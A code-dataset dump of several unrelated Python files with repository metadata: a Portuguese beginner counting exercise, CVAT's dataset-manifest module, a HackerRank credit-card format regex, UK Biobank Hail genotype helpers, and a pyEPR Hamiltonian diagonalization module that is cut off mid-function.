DESAFIO-064.py
|
Lukones/Evolution-Projetos-Python
|
d979f3702f0e22ab5256b19fd957dba587c44f85
|
[
"MIT"
] | null | null | null |
from time import sleep
cont18 = conthomen = contF20 = 0
while True:
idade = int(input('Digite sua idade: '))
sexo = ' '
while sexo not in 'FM':
sexo = str(input('Digite seu sexo [F/M]: ')).strip().upper()[0]
print('='*30)
print('\033[4;31mCADASTRANDO...\033[m')
print('='*30)
sleep(1)
if sexo in 'Ff':
if idade <= 20:
contF20 += 1
if sexo in 'Mm':
conthomen += 1
if idade >= 18:
cont18 += 1
dnv = ' '
while dnv not in 'SsNn':
dnv = str(input('Deseja continuar a cadastrar pessoas? [S/N] ')).strip().upper()[0]
if dnv in 'Nn':
break
print(f'Você cadastrou um total de {cont18} pessoa(s) acima de 18 anos')
print(f'Você cadastrou um total de {conthomen} homens')
print(f'Você cadastrou um total de {contF20} mulheres com menos de 20 anos')
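# English summary (added for clarity; the program's prompts and output are in Portuguese):
# the loop registers people by age and sex until the user answers 'N', then reports how many
# registered people are 18 or older, how many are men, and how many are women under 20.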
| 30.392857
| 91
| 0.578143
|
794fdf7e6c7d106a5c9fe7a38b91e796b67a67ca
| 18,746
|
py
|
Python
|
utils/dataset_manifest/core.py
|
minguin05/cvat
|
c85bfb86f22e3840dee2f9d60ed4caf229302782
|
[
"Intel",
"MIT"
] | 2
|
2022-03-13T03:45:15.000Z
|
2022-03-13T03:46:19.000Z
|
utils/dataset_manifest/core.py
|
minguin05/cvat
|
c85bfb86f22e3840dee2f9d60ed4caf229302782
|
[
"Intel",
"MIT"
] | null | null | null |
utils/dataset_manifest/core.py
|
minguin05/cvat
|
c85bfb86f22e3840dee2f9d60ed4caf229302782
|
[
"Intel",
"MIT"
] | null | null | null |
# Copyright (C) 2021 Intel Corporation
#
# SPDX-License-Identifier: MIT
import av
import json
import os
from abc import ABC, abstractmethod, abstractproperty
from collections import OrderedDict
from contextlib import closing
from PIL import Image
from .utils import md5_hash, rotate_image
class VideoStreamReader:
def __init__(self, source_path):
self.source_path = source_path
self._key_frames = OrderedDict()
self.frames = 0
with closing(av.open(self.source_path, mode='r')) as container:
self.width, self.height = self._get_frame_size(container)
@staticmethod
def _get_video_stream(container):
video_stream = next(stream for stream in container.streams if stream.type == 'video')
video_stream.thread_type = 'AUTO'
return video_stream
@staticmethod
def _get_frame_size(container):
video_stream = VideoStreamReader._get_video_stream(container)
for packet in container.demux(video_stream):
for frame in packet.decode():
if video_stream.metadata.get('rotate'):
frame = av.VideoFrame().from_ndarray(
rotate_image(
frame.to_ndarray(format='bgr24'),
360 - int(container.streams.video[0].metadata.get('rotate')),
),
format ='bgr24',
)
return frame.width, frame.height
def check_type_first_frame(self):
with closing(av.open(self.source_path, mode='r')) as container:
video_stream = self._get_video_stream(container)
for packet in container.demux(video_stream):
for frame in packet.decode():
if not frame.pict_type.name == 'I':
raise Exception('First frame is not key frame')
return
def check_video_timestamps_sequences(self):
with closing(av.open(self.source_path, mode='r')) as container:
video_stream = self._get_video_stream(container)
frame_pts = -1
frame_dts = -1
for packet in container.demux(video_stream):
for frame in packet.decode():
if None not in {frame.pts, frame_pts} and frame.pts <= frame_pts:
raise Exception('Invalid pts sequences')
if None not in {frame.dts, frame_dts} and frame.dts <= frame_dts:
raise Exception('Invalid dts sequences')
frame_pts, frame_dts = frame.pts, frame.dts
def rough_estimate_frames_ratio(self, upper_bound):
analyzed_frames_number, key_frames_number = 0, 0
_processing_end = False
with closing(av.open(self.source_path, mode='r')) as container:
video_stream = self._get_video_stream(container)
for packet in container.demux(video_stream):
for frame in packet.decode():
if frame.key_frame:
key_frames_number += 1
analyzed_frames_number += 1
if upper_bound == analyzed_frames_number:
_processing_end = True
break
if _processing_end:
break
# In our case no videos with non-key first frame, so 1 key frame is guaranteed
return analyzed_frames_number // key_frames_number
def validate_frames_ratio(self, chunk_size):
upper_bound = 3 * chunk_size
ratio = self.rough_estimate_frames_ratio(upper_bound + 1)
assert ratio < upper_bound, 'Too few keyframes'
def get_size(self):
return self.frames
@property
def frame_sizes(self):
return (self.width, self.height)
def validate_key_frame(self, container, video_stream, key_frame):
for packet in container.demux(video_stream):
for frame in packet.decode():
if md5_hash(frame) != key_frame[1]['md5'] or frame.pts != key_frame[1]['pts']:
self._key_frames.pop(key_frame[0])
return
def validate_seek_key_frames(self):
with closing(av.open(self.source_path, mode='r')) as container:
video_stream = self._get_video_stream(container)
key_frames_copy = self._key_frames.copy()
for key_frame in key_frames_copy.items():
container.seek(offset=key_frame[1]['pts'], stream=video_stream)
self.validate_key_frame(container, video_stream, key_frame)
def save_key_frames(self):
with closing(av.open(self.source_path, mode='r')) as container:
video_stream = self._get_video_stream(container)
frame_number = 0
for packet in container.demux(video_stream):
for frame in packet.decode():
if frame.key_frame:
self._key_frames[frame_number] = {
'pts': frame.pts,
'md5': md5_hash(frame),
}
frame_number += 1
self.frames = frame_number
@property
def key_frames(self):
return self._key_frames
def __len__(self):
return len(self._key_frames)
#TODO: need to change it in future
def __iter__(self):
for idx, key_frame in self._key_frames.items():
yield (idx, key_frame['pts'], key_frame['md5'])
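# Illustrative usage sketch (not part of the original module), mirroring what
# VideoManifestManager.prepare_meta does further below; the video path is hypothetical:
#
#   reader = VideoStreamReader(source_path='example_video.mp4')
#   reader.check_type_first_frame()            # the first frame must be a key frame
#   reader.check_video_timestamps_sequences()  # pts/dts must be strictly increasing
#   reader.save_key_frames()                   # records pts and md5 for every key frame
#   for frame_number, pts, md5 in reader:
#       pass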
class DatasetImagesReader:
def __init__(self, sources, meta=None, is_sorted=True, use_image_hash=False, *args, **kwargs):
self._sources = sources if is_sorted else sorted(sources)
self._meta = meta
self._content = []
self._data_dir = kwargs.get('data_dir', None)
self._use_image_hash = use_image_hash
def __iter__(self):
for image in self._sources:
img = Image.open(image, mode='r')
img_name = os.path.relpath(image, self._data_dir) if self._data_dir \
else os.path.basename(image)
name, extension = os.path.splitext(img_name)
image_properties = {
'name': name,
'extension': extension,
'width': img.width,
'height': img.height,
}
if self._meta and img_name in self._meta:
image_properties['meta'] = self._meta[img_name]
if self._use_image_hash:
image_properties['checksum'] = md5_hash(img)
yield image_properties
def create(self):
for item in self:
self._content.append(item)
@property
def content(self):
return self._content
class _Manifest:
FILE_NAME = 'manifest.jsonl'
VERSION = '1.1'
def __init__(self, path, upload_dir=None):
        assert path, 'A path to the manifest file was not found'
self._path = os.path.join(path, self.FILE_NAME) if os.path.isdir(path) else path
self._upload_dir = upload_dir
@property
def path(self):
return self._path
@property
def name(self):
return os.path.basename(self._path) if not self._upload_dir \
else os.path.relpath(self._path, self._upload_dir)
# Needed for faster iteration over the manifest file, will be generated to work inside CVAT
# and will not be generated when manually creating a manifest
class _Index:
FILE_NAME = 'index.json'
def __init__(self, path):
assert path and os.path.isdir(path), 'No index directory path'
self._path = os.path.join(path, self.FILE_NAME)
self._index = {}
@property
def path(self):
return self._path
def dump(self):
with open(self._path, 'w') as index_file:
json.dump(self._index, index_file, separators=(',', ':'))
def load(self):
with open(self._path, 'r') as index_file:
self._index = json.load(index_file,
object_hook=lambda d: {int(k): v for k, v in d.items()})
def remove(self):
os.remove(self._path)
def create(self, manifest, skip):
        assert os.path.exists(manifest), 'The manifest file does not exist, the index cannot be created'
with open(manifest, 'r+') as manifest_file:
while skip:
manifest_file.readline()
skip -= 1
image_number = 0
position = manifest_file.tell()
line = manifest_file.readline()
while line:
if line.strip():
self._index[image_number] = position
image_number += 1
position = manifest_file.tell()
line = manifest_file.readline()
def partial_update(self, manifest, number):
        assert os.path.exists(manifest), 'The manifest file does not exist, the index cannot be updated'
with open(manifest, 'r+') as manifest_file:
manifest_file.seek(self._index[number])
line = manifest_file.readline()
while line:
if line.strip():
self._index[number] = manifest_file.tell()
number += 1
line = manifest_file.readline()
def __getitem__(self, number):
assert 0 <= number < len(self), \
            'An invalid index number: {}\nMax: {}'.format(number, len(self))
return self._index[number]
def __len__(self):
return len(self._index)
class _ManifestManager(ABC):
BASE_INFORMATION = {
'version' : 1,
'type': 2,
}
def _json_item_is_valid(self, **state):
for item in self._requared_item_attributes:
if state.get(item, None) is None:
raise Exception(f"Invalid '{self.manifest.name} file structure': '{item}' is required, but not found")
def __init__(self, path, upload_dir=None, *args, **kwargs):
self._manifest = _Manifest(path, upload_dir)
self._index = _Index(os.path.dirname(self._manifest.path))
def _parse_line(self, line):
""" Getting a random line from the manifest file """
with open(self._manifest.path, 'r') as manifest_file:
if isinstance(line, str):
assert line in self.BASE_INFORMATION.keys(), \
'An attempt to get non-existent information from the manifest'
for _ in range(self.BASE_INFORMATION[line]):
fline = manifest_file.readline()
return json.loads(fline)[line]
else:
assert self._index, 'No prepared index'
offset = self._index[line]
manifest_file.seek(offset)
properties = manifest_file.readline()
parsed_properties = json.loads(properties)
self._json_item_is_valid(**parsed_properties)
return parsed_properties
def init_index(self):
if os.path.exists(self._index.path):
self._index.load()
else:
self._index.create(self._manifest.path, 3 if self._manifest.TYPE == 'video' else 2)
self._index.dump()
def reset_index(self):
if os.path.exists(self._index.path):
self._index.remove()
def set_index(self):
self.reset_index()
self.init_index()
@abstractmethod
def create(self, content, **kwargs):
pass
@abstractmethod
def partial_update(self, number, properties):
pass
def __iter__(self):
with open(self._manifest.path, 'r') as manifest_file:
manifest_file.seek(self._index[0])
image_number = 0
line = manifest_file.readline()
while line:
                if not line.strip():
                    # skip blank lines, but keep consuming the file so the loop cannot stall
                    line = manifest_file.readline()
                    continue
parsed_properties = json.loads(line)
self._json_item_is_valid(**parsed_properties)
yield (image_number, parsed_properties)
image_number += 1
line = manifest_file.readline()
@property
def manifest(self):
return self._manifest
def __len__(self):
if hasattr(self, '_index'):
return len(self._index)
else:
return None
def __getitem__(self, item):
return self._parse_line(item)
@property
def index(self):
return self._index
@abstractproperty
def data(self):
pass
@abstractmethod
def get_subset(self, subset_names):
pass
class VideoManifestManager(_ManifestManager):
_requared_item_attributes = {'number', 'pts'}
def __init__(self, manifest_path):
super().__init__(manifest_path)
setattr(self._manifest, 'TYPE', 'video')
self.BASE_INFORMATION['properties'] = 3
def create(self, content, **kwargs):
""" Creating and saving a manifest file """
with open(self._manifest.path, 'w') as manifest_file:
base_info = {
'version': self._manifest.VERSION,
'type': self._manifest.TYPE,
'properties': {
'name': os.path.basename(content.source_path),
'resolution': content.frame_sizes,
'length': content.get_size(),
},
}
for key, value in base_info.items():
json_item = json.dumps({key: value}, separators=(',', ':'))
manifest_file.write(f'{json_item}\n')
for item in content:
json_item = json.dumps({
'number': item[0],
'pts': item[1],
'checksum': item[2]
}, separators=(',', ':'))
manifest_file.write(f"{json_item}\n")
def partial_update(self, number, properties):
pass
@staticmethod
def prepare_meta(media_file, upload_dir=None, chunk_size=36, force=False):
source_path = os.path.join(upload_dir, media_file) if upload_dir else media_file
meta_info = VideoStreamReader(source_path=source_path)
meta_info.check_type_first_frame()
try:
meta_info.validate_frames_ratio(chunk_size)
except AssertionError:
if not force:
raise
meta_info.check_video_timestamps_sequences()
meta_info.save_key_frames()
meta_info.validate_seek_key_frames()
return meta_info
@property
def video_name(self):
return self['properties']['name']
@property
def video_resolution(self):
return self['properties']['resolution']
@property
def video_length(self):
return self['properties']['length']
@property
def data(self):
return (self.video_name)
def get_subset(self, subset_names):
raise NotImplementedError()
#TODO: add generic manifest structure file validation
class ManifestValidator:
def validate_base_info(self):
with open(self._manifest.path, 'r') as manifest_file:
assert self._manifest.VERSION != json.loads(manifest_file.readline())['version']
assert self._manifest.TYPE != json.loads(manifest_file.readline())['type']
class VideoManifestValidator(VideoManifestManager):
def __init__(self, source_path, manifest_path):
self.source_path = source_path
super().__init__(manifest_path)
@staticmethod
def _get_video_stream(container):
video_stream = next(stream for stream in container.streams if stream.type == 'video')
video_stream.thread_type = 'AUTO'
return video_stream
def validate_key_frame(self, container, video_stream, key_frame):
for packet in container.demux(video_stream):
for frame in packet.decode():
assert frame.pts == key_frame['pts'], "The uploaded manifest does not match the video"
return
def validate_seek_key_frames(self):
with closing(av.open(self.source_path, mode='r')) as container:
video_stream = self._get_video_stream(container)
last_key_frame = None
for _, key_frame in self:
# check that key frames sequence sorted
if last_key_frame and last_key_frame['number'] >= key_frame['number']:
raise AssertionError('Invalid saved key frames sequence in manifest file')
container.seek(offset=key_frame['pts'], stream=video_stream)
self.validate_key_frame(container, video_stream, key_frame)
last_key_frame = key_frame
def validate_frame_numbers(self):
with closing(av.open(self.source_path, mode='r')) as container:
video_stream = self._get_video_stream(container)
# not all videos contain information about numbers of frames
frames = video_stream.frames
if frames:
assert frames == self.video_length, "The uploaded manifest does not match the video"
return
class ImageManifestManager(_ManifestManager):
_requared_item_attributes = {'name', 'extension'}
def __init__(self, manifest_path, upload_dir=None):
super().__init__(manifest_path, upload_dir)
setattr(self._manifest, 'TYPE', 'images')
def create(self, content, **kwargs):
""" Creating and saving a manifest file"""
with open(self._manifest.path, 'w') as manifest_file:
base_info = {
'version': self._manifest.VERSION,
'type': self._manifest.TYPE,
}
for key, value in base_info.items():
json_item = json.dumps({key: value}, separators=(',', ':'))
manifest_file.write(f'{json_item}\n')
for item in content:
json_item = json.dumps({
key: value for key, value in item.items()
}, separators=(',', ':'))
manifest_file.write(f"{json_item}\n")
def partial_update(self, number, properties):
pass
@staticmethod
def prepare_meta(sources, **kwargs):
meta_info = DatasetImagesReader(sources=sources, **kwargs)
meta_info.create()
return meta_info
@property
def data(self):
return (f"{image['name']}{image['extension']}" for _, image in self)
def get_subset(self, subset_names):
return ({
'name': f"{image['name']}",
'extension': f"{image['extension']}",
'width': image['width'],
'height': image['height'],
'meta': image['meta'],
'checksum': f"{image['checksum']}"
} for _, image in self if f"{image['name']}{image['extension']}" in subset_names)
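# Illustrative usage sketch (not part of the original module); the manifest location and
# image paths below are hypothetical:
#
#   manager = ImageManifestManager('/tmp/dataset/manifest.jsonl')
#   meta = ImageManifestManager.prepare_meta(sources=['/tmp/dataset/img_0001.png'])
#   manager.create(meta.content)   # writes the version/type header plus one JSON line per image
#   manager.set_index()            # builds index.json next to the manifest for random access
#   for number, properties in manager:
#       print(number, properties['name'], properties['extension'])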
| 36.4
| 118
| 0.591273
|
794fdfe34467fd8272a26ebd5b4c6566bf325719
| 268
|
py
|
Python
|
medium/13_validate_credit_card_nums.py
|
UltiRequiem/hacker-rank-python
|
bcc6a467dd2a1f90cf61c1d6b049f566f5ffabe1
|
[
"MIT"
] | 4
|
2021-08-02T21:34:38.000Z
|
2021-09-24T03:26:33.000Z
|
medium/13_validate_credit_card_nums.py
|
UltiRequiem/hacker-rank-python
|
bcc6a467dd2a1f90cf61c1d6b049f566f5ffabe1
|
[
"MIT"
] | null | null | null |
medium/13_validate_credit_card_nums.py
|
UltiRequiem/hacker-rank-python
|
bcc6a467dd2a1f90cf61c1d6b049f566f5ffabe1
|
[
"MIT"
] | 3
|
2021-08-02T21:34:39.000Z
|
2021-08-02T21:37:16.000Z
|
from re import compile
def run(DATA):
for _ in range(int(input().strip())):
print("Valid" if DATA.search(input().strip()) else "Invalid")
if __name__ == "__main__":
run(compile(r"^" r"(?!.*(\d)(-?\1){3})" r"[456]" r"\d{3}" r"(?:-?\d{4}){3}" r"$"))
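# Illustrative breakdown of the pattern above (added comments, not part of the original
# solution):
#   ^ ... $              the whole line must match
#   (?!.*(\d)(-?\1){3})  reject any digit repeated 4 or more times in a row,
#                        even when the repeats are separated by single hyphens
#   [456]\d{3}           the number must start with 4, 5 or 6; first group of 4 digits
#   (?:-?\d{4}){3}       three more groups of 4 digits, each optionally preceded
#                        by one hyphen (16 digits in total)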
| 24.363636
| 86
| 0.526119
|
794fe06b2f1e44b4fc0a7ec067a3c1433ab4528c
| 3,434
|
py
|
Python
|
resources/genotypes.py
|
rahulg603/ukbb_pan_ancestry
|
482f23f0ae7ea14a92540f218aa7b0750e207605
|
[
"MIT"
] | null | null | null |
resources/genotypes.py
|
rahulg603/ukbb_pan_ancestry
|
482f23f0ae7ea14a92540f218aa7b0750e207605
|
[
"MIT"
] | null | null | null |
resources/genotypes.py
|
rahulg603/ukbb_pan_ancestry
|
482f23f0ae7ea14a92540f218aa7b0750e207605
|
[
"MIT"
] | null | null | null |
import hail as hl
from .generic import *
ukb_imputed_bgen_path = 'gs://fc-7d5088b4-7673-45b5-95c2-17ae00a04183/imputed/ukb_imp_chr{}_v3.bgen'
ukb_imputed_info_path = 'gs://fc-7d5088b4-7673-45b5-95c2-17ae00a04183/imputed/ukb_mfi_chr{}_v3.txt'
ukb_imputed_info_ht_path = f'{bucket}/imputed/ukb_mfi_v3.ht'
def get_sample_file(chromosome: str = '1'):
if chromosome not in ('X', 'XY'):
chromosome = 'autosomes'
elif not chromosome.startswith('chr'):
chromosome = f'chr{chromosome}'
return f'gs://ukb31063/ukb31063.{chromosome}.sample'
def get_ukb_imputed_data(chromosome: str = '1', variant_list: hl.Table = None, entry_fields = ('GP', )):
if chromosome == 'all':
chromosome = '{' + ','.join(map(str, range(1, 23))) + '}'
add_args = {}
if variant_list is not None:
add_args['variants'] = variant_list
return hl.import_bgen(ukb_imputed_bgen_path.format(chromosome), entry_fields=entry_fields,
sample_file=get_sample_file(chromosome), **add_args)
def get_filtered_mt(chrom: str = 'all',
pop: str = 'all',
imputed: bool = True,
min_mac: int = 20,
entry_fields=('GP',),
filter_mac_instead_of_ac: bool = False):
# get ac or mac based on filter_mac_instead_of_ac
def get_ac(af, an):
if filter_mac_instead_of_ac:
            # Note that the underlying file behind get_ukb_af_ht_path() accidentally doubles af and halves an
return (1.0 - hl.abs(1.0 - af)) * an
else:
return af * an
if imputed:
ht = hl.read_table(get_ukb_af_ht_path())
if pop == 'all':
ht = ht.filter(hl.any(lambda x: get_ac(ht.af[x], ht.an[x]) >= min_mac, hl.literal(POPS)))
else:
ht = ht.filter(get_ac(ht.af[pop], ht.an[pop]) >= min_mac)
mt = get_ukb_imputed_data(chrom, variant_list=ht, entry_fields=entry_fields)
else:
mt = hl.read_matrix_table('gs://ukb31063/ukb31063.genotype.mt')
covariates_ht = get_covariates()
hq_samples_ht = get_hq_samples()
mt = mt.annotate_cols(**covariates_ht[mt.s])
mt = mt.filter_cols(hl.is_defined(mt.pop) & hl.is_defined(hq_samples_ht[mt.s]))
if pop != 'all': mt = mt.filter_cols(mt.pop == pop)
return mt
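# Illustrative call sketch (not part of the original module); the chromosome, population
# label and threshold below are only examples:
#
#   mt = get_filtered_mt(chrom='22', pop='EUR', imputed=True, min_mac=20)
#
# With imputed=True the function filters the UKB allele-frequency table to variants whose
# allele count (or minor allele count, if filter_mac_instead_of_ac=True) reaches min_mac in
# the requested population, imports the matching BGEN data, then keeps only high-quality
# samples of that population.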
def get_ukb_af_ht_path(with_x = True, repart=False):
return f'{bucket}/imputed/ukb_frequencies{"_with_x" if with_x else ""}{".repart" if repart else ""}.ht'
def get_ukb_vep_path():
return f'{bucket}/results/misc/ukb.vep.ht'
def get_ukb_grm_mt_path(pop: str, data_iteration: int = 0):
suffix = f'.{data_iteration}' if data_iteration else ""
return f'{bucket}/results/misc/ukb.{pop}.for_grm{suffix}.mt'
def get_ukb_grm_pruned_ht_path(pop: str, window_size: str = '1e6'):
cut = '' if window_size == '1e6' else f'.{window_size}'
return f'{bucket}/results/misc/ukb.{pop}.for_grm.pruned{cut}.ht'
def get_ukb_grm_plink_path(pop: str, data_iteration: int = 0, window_size: str = '1e6'):
suffix = f'.{data_iteration}' if data_iteration else ""
cut = '' if window_size == '1e6' else f'.{window_size}'
return f'{bucket}/results/misc/ukb.{pop}.for_grm{suffix}.pruned{cut}.plink'
def get_ukb_samples_file_path(pop: str, data_iteration: int = 0):
suffix = f'.{data_iteration}' if data_iteration else ""
return f'{bucket}/results/misc/ukb.{pop}{suffix}.samples'
| 39.471264
| 107
| 0.650844
|
794fe08c919b830bfb4dda4da5bc1421b03d15e5
| 12,844
|
py
|
Python
|
pyEPR/calcs/back_box_numeric.py
|
mkxia57/pyEPR
|
fab8c9434888982dcf4a8cec1d348200dbb02d11
|
[
"BSD-3-Clause"
] | 109
|
2017-09-19T18:53:45.000Z
|
2022-03-07T17:39:09.000Z
|
pyEPR/calcs/back_box_numeric.py
|
mkxia57/pyEPR
|
fab8c9434888982dcf4a8cec1d348200dbb02d11
|
[
"BSD-3-Clause"
] | 78
|
2017-09-21T16:08:55.000Z
|
2022-03-31T12:42:52.000Z
|
pyEPR/calcs/back_box_numeric.py
|
mkxia57/pyEPR
|
fab8c9434888982dcf4a8cec1d348200dbb02d11
|
[
"BSD-3-Clause"
] | 139
|
2017-09-18T19:01:20.000Z
|
2022-03-22T21:07:59.000Z
|
'''
Numerical diagonalization of quantum Hamiltonian and parameter
extraction.
@author: Phil Reinhold, Zlatko Minev, Lysander Christakis
Original code on black_box_hamiltonian and make_dispersive functions by Phil Reinhold
Revisions and updates by Zlatko Minev & Lysander Christakis
'''
# pylint: disable=invalid-name
from __future__ import print_function
from functools import reduce
import numpy as np
from .constants import Planck as h
from .constants import fluxQ, hbar
from .hamiltonian import MatrixOps
try:
import qutip
from qutip import basis, tensor
except (ImportError, ModuleNotFoundError):
pass
__all__ = [ 'epr_numerical_diagonalization',
'make_dispersive',
'black_box_hamiltonian',
'black_box_hamiltonian_nq']
dot = MatrixOps.dot
cos_approx = MatrixOps.cos_approx
# ==============================================================================
# ANALYSIS FUNCTIONS
# ==============================================================================
def epr_numerical_diagonalization(freqs, Ljs, ϕzpf,
cos_trunc=8,
fock_trunc=9,
use_1st_order=False,
return_H=False):
'''
    Numerical diagonalization for pyEPR. Ask Zlatko for details.
    :param fs: (GHz, not radians) Linearized model, H_lin, normal mode frequencies in GHz, length M
    :param ljs: (Henries) junction linearized inductances in Henries, length J
    :param fzpfs: (reduced) Reduced Zero-point fluctuation of the junction fluxes for each mode
across each junction, shape MxJ
:return: Hamiltonian mode freq and dispersive shifts. Shifts are in MHz.
Shifts have flipped sign so that down shift is positive.
'''
freqs, Ljs, ϕzpf = map(np.array, (freqs, Ljs, ϕzpf))
assert(all(freqs < 1E6)
), "Please input the frequencies in GHz. \N{nauseated face}"
assert(all(Ljs < 1E-3)
), "Please input the inductances in Henries. \N{nauseated face}"
    Hs = black_box_hamiltonian(freqs * 1E9, Ljs.astype(float), fluxQ*ϕzpf,
cos_trunc, fock_trunc, individual=use_1st_order)
f_ND, χ_ND, _, _ = make_dispersive(
Hs, fock_trunc, ϕzpf, freqs, use_1st_order=use_1st_order)
χ_ND = -1*χ_ND * 1E-6 # convert to MHz, and flip sign so that down shift is positive
return (f_ND, χ_ND, Hs) if return_H else (f_ND, χ_ND)
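# Illustrative call sketch (not part of the original module): a single-mode, single-junction
# toy model with made-up numbers, following the unit conventions stated in the docstring
# (GHz frequencies, inductances in Henries, reduced flux ZPF as an MxJ array):
#
#   f_ND, chi_ND = epr_numerical_diagonalization(
#       freqs=[5.0],        # GHz
#       Ljs=[10e-9],        # Henries
#       ϕzpf=[[0.05]],      # M x J reduced zero-point fluxes
#       cos_trunc=8, fock_trunc=9)
#
# f_ND holds the dressed mode frequencies and chi_ND the chi matrix in MHz, with the sign
# flipped so that a downward shift is positive.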
def black_box_hamiltonian(fs, ljs, fzpfs, cos_trunc=5, fock_trunc=8, individual=False):
r"""
:param fs: Linearized model, H_lin, normal mode frequencies in Hz, length N
    :param ljs: junction linearized inductances in Henries, length M
    :param fzpfs: Zero-point fluctuation of the junction fluxes for each mode across each junction,
shape MxJ
:return: Hamiltonian in units of Hz (i.e H / h)
All in SI units. The ZPF fed in are the generalized, not reduced, flux.
Description:
Takes the linear mode frequencies, $\omega_m$, and the zero-point fluctuations, ZPFs, and
builds the Hamiltonian matrix of $H_full$, assuming cos potential.
"""
n_modes = len(fs)
njuncs = len(ljs)
fs, ljs, fzpfs = map(np.array, (fs, ljs, fzpfs))
ejs = fluxQ**2 / ljs
fjs = ejs / h
fzpfs = np.transpose(fzpfs) # Take from MxJ to JxM
assert np.isnan(fzpfs).any(
) == False, "Phi ZPF has NAN, this is NOT allowed! Fix me. \n%s" % fzpfs
assert np.isnan(ljs).any(
) == False, "Ljs has NAN, this is NOT allowed! Fix me."
assert np.isnan(
fs).any() == False, "freqs has NAN, this is NOT allowed! Fix me."
assert fzpfs.shape == (njuncs, n_modes), "incorrect shape for zpf array, {} not {}".format(
fzpfs.shape, (njuncs, n_modes))
assert fs.shape == (n_modes,), "incorrect number of mode frequencies"
assert ejs.shape == (njuncs,), "incorrect number of qubit frequencies"
def tensor_out(op, loc):
"Make operator <op> tensored with identities at locations other than <loc>"
op_list = [qutip.qeye(fock_trunc) for i in range(n_modes)]
op_list[loc] = op
return reduce(qutip.tensor, op_list)
a = qutip.destroy(fock_trunc)
ad = a.dag()
n = qutip.num(fock_trunc)
mode_fields = [tensor_out(a + ad, i) for i in range(n_modes)]
mode_ns = [tensor_out(n, i) for i in range(n_modes)]
def cos(x):
return cos_approx(x, cos_trunc=cos_trunc)
linear_part = dot(fs, mode_ns)
cos_interiors = [dot(fzpf_row/fluxQ, mode_fields) for fzpf_row in fzpfs]
nonlinear_part = dot(-fjs, map(cos, cos_interiors))
if individual:
return linear_part, nonlinear_part
else:
return linear_part + nonlinear_part
bbq_hmt = black_box_hamiltonian
def make_dispersive(H, fock_trunc, fzpfs=None, f0s=None, chi_prime=False,
use_1st_order=False):
r"""
Input: Hamiltonian Matrix.
    Optional: phi_zpfs and normal mode frequencies, f0s.
use_1st_order : deprecated
Output:
Return dressed mode frequencies, chis, chi prime, phi_zpf flux (not reduced), and linear frequencies
Description:
    Takes the Hamiltonian matrix `H` from bbq_hmt. It then finds the eigenvalues/eigenvectors and assigns quantum numbers to them --- i.e., mode excitations, such as, for instance, for three modes, |0,0,0> or |0,0,1>, which correspond to no excitations in any of the modes or one excitation in the 3rd mode, resp. The assignment is performed based on the maximum overlap between the eigenvectors of H_full and H_lin. If this crude explanation is confusing, let me know, I will write a more detailed one :slightly_smiling_face:
Based on the assignment of the excitations, the function returns the dressed mode frequencies $\omega_m^\prime$, and the cross-Kerr matrix (including anharmonicities) extracted from the numerical diagonalization, as well as from 1st order perturbation theory.
Note, the diagonal of the CHI matrix is directly the anharmonicity term.
"""
if hasattr(H, '__len__'): # is it an array / list?
[H_lin, H_nl] = H
H = H_lin + H_nl
    else:  # make sure it's a quantum object
assert type(
H) == qutip.qobj.Qobj, "Please pass in either a list of Qobjs or Qobj for the Hamiltonian"
print("Starting the diagonalization")
evals, evecs = H.eigenstates()
print("Finished the diagonalization")
evals -= evals[0]
N = int(np.log(H.shape[0]) / np.log(fock_trunc)) # number of modes
assert H.shape[0] == fock_trunc ** N
def fock_state_on(d):
''' d={mode number: # of photons} '''
return qutip.tensor(*[qutip.basis(fock_trunc, d.get(i, 0)) for i in range(N)]) # give me the value d[i] or 0 if d[i] does not exist
if use_1st_order:
num_modes = N
print("Using 1st O")
def multi_index_2_vector(d, num_modes, fock_trunc):
return tensor([basis(fock_trunc, d.get(i, 0)) for i in range(num_modes)])
        '''this function creates a vector representation of a given fock state given the data for excitations per
mode of the form d={mode number: # of photons}'''
def find_multi_indices(fock_trunc):
multi_indices = [{ind: item for ind, item in enumerate([i, j, k])} for i in range(fock_trunc)
for j in range(fock_trunc)
for k in range(fock_trunc)]
return multi_indices
'''this function generates all possible multi-indices for three modes for a given fock_trunc'''
def get_expect_number(left, middle, right):
return (left.dag()*middle*right).data.toarray()[0, 0]
'''this function calculates the expectation value of an operator called "middle" '''
def get_basis0(fock_trunc, num_modes):
multi_indices = find_multi_indices(fock_trunc)
basis0 = [multi_index_2_vector(
multi_indices[i], num_modes, fock_trunc) for i in range(len(multi_indices))]
evalues0 = [get_expect_number(v0, H_lin, v0).real for v0 in basis0]
return multi_indices, basis0, evalues0
'''this function creates a basis of fock states and their corresponding eigenvalues'''
def closest_state_to(vector0):
def PT_on_vector(original_vector, original_basis, pertub, energy0, evalue):
new_vector = 0 * original_vector
for i in range(len(original_basis)):
if (energy0[i]-evalue) > 1e-3:
new_vector += ((original_basis[i].dag()*H_nl*original_vector).data.toarray()[
0, 0])*original_basis[i]/(evalue-energy0[i])
else:
pass
return (new_vector + original_vector)/(new_vector + original_vector).norm()
'''this function calculates the normalized vector with the first order correction term
from the non-linear hamiltonian '''
[multi_indices, basis0, evalues0] = get_basis0(
fock_trunc, num_modes)
evalue0 = get_expect_number(vector0, H_lin, vector0)
vector1 = PT_on_vector(vector0, basis0, H_nl, evalues0, evalue0)
index = np.argmax([(vector1.dag() * evec).norm()
for evec in evecs])
return evals[index], evecs[index]
else:
def closest_state_to(s):
def distance(s2):
return (s.dag() * s2[1]).norm()
return max(zip(evals, evecs), key=distance)
f1s = [closest_state_to(fock_state_on({i: 1}))[0] for i in range(N)]
chis = [[0]*N for _ in range(N)]
chips = [[0]*N for _ in range(N)]
for i in range(N):
for j in range(i, N):
d = {k: 0 for k in range(N)} # put 0 photons in each mode (k)
d[i] += 1
d[j] += 1
# load ith mode and jth mode with 1 photon
fs = fock_state_on(d)
ev, evec = closest_state_to(fs)
chi = (ev - (f1s[i] + f1s[j]))
chis[i][j] = chi
chis[j][i] = chi
if chi_prime:
d[j] += 1
fs = fock_state_on(d)
ev, evec = closest_state_to(fs)
chip = (ev - (f1s[i] + 2*f1s[j]) - 2 * chis[i][j])
chips[i][j] = chip
chips[j][i] = chip
if chi_prime:
return np.array(f1s), np.array(chis), np.array(chips), np.array(fzpfs), np.array(f0s)
else:
return np.array(f1s), np.array(chis), np.array(fzpfs), np.array(f0s)
def black_box_hamiltonian_nq(freqs, zmat, ljs, cos_trunc=6, fock_trunc=8, show_fit=False):
"""
N-Qubit version of bbq, based on the full Z-matrix
Currently reproduces 1-qubit data, untested on n-qubit data
Assume: Solve the model without loss in HFSS.
"""
nf = len(freqs)
nj = len(ljs)
